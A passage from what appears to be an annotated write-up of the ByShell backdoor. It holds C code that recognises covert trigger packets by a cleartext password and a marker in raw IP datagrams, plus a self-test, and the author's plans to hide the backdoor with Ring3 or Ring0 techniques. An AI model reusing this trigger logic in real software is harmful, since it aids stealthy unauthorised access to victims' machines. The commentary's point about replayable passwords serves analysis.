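        return PKT_OTHER;
    if (pkt[9] == PROTO_DATA)
        return PKT_BY_DATA;
    if (pkt[9] != PROTO_CTRL)
        return PKT_OTHER;
    if ((pkt[0] & 0x0F) != 5)               /* the fixed offsets assume no IP options */
        return PKT_BY_CONTROL;
    size_t pwd_len = strlen(pwd);
    if (len < MARKER_OFF + MARKER_LEN || len < PWD_OFF + pwd_len)
        return PKT_BY_CONTROL;
    if (memcmp(pkt + PWD_OFF, pwd, pwd_len) == 0 &&
        memcmp(pkt + MARKER_OFF, REFRESH_MARKER, MARKER_LEN) == 0)
        return PKT_BY_REFRESH;
    return PKT_BY_CONTROL;
}

/* A checksum taken over a header that includes its own checksum field is 0. */
int header_checksum_ok(const uint8_t *pkt, size_t len)
{
    return len >= IP_HDR_LEN && ip_checksum(pkt, IP_HDR_LEN) == 0;
}

/* Round trip over a constructed datagram; returns 0 on success, else the failing step. */
int self_check(void)
{
    uint8_t pkt[128];                       /* same size as the article's buff224 */
    size_t n = build_refresh_packet(pkt, sizeof pkt, "by", 0x0A000001u, 0x0A000002u);
    if (n != MARKER_OFF + MARKER_LEN) return 1;
    if (!header_checksum_ok(pkt, n)) return 2;
    if (classify_packet(pkt, n, "by") != PKT_BY_REFRESH) return 3;
    if (classify_packet(pkt, n, "xx") != PKT_BY_CONTROL) return 4;
    if (classify_packet(pkt, 40, "by") != PKT_BY_CONTROL) return 5;   /* truncated */
    pkt[9] = PROTO_DATA;
    if (classify_packet(pkt, n, "by") != PKT_BY_DATA) return 6;
    pkt[9] = 6;                             /* plain TCP is ignored */
    if (classify_packet(pkt, n, "by") != PKT_OTHER) return 7;
    return 0;
}

int main(void) { return self_check(); }
```

The builder fills the header the way the sending side of a raw socket must when the kernel is not doing it, which is also why the "password" check here is no authentication at all: anyone who captures one datagram has the password in clear and can replay the refresh, which the loop above accepts and acts on.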
In the future it may be rewritten as Ring3 multiplexing like Hxdef's, or as a Ring0 filter driver or something of that kind; I hope the seniors will keep guiding me. My coding style is not good, I like cramped code regardless of line breaks, but I still hope we can develop this software together. Three people gave me a lot of help in writing this backdoor, and I ask for space to thank them: gxisone, Huang Xin (黄鑫, author of Glacier) and, of course, Nongfu; the credit for this backdoor should be theirs. If you have a question or want to exchange ideas with me, please mail me. Thank you all for your attention to and support of ByShell and of me.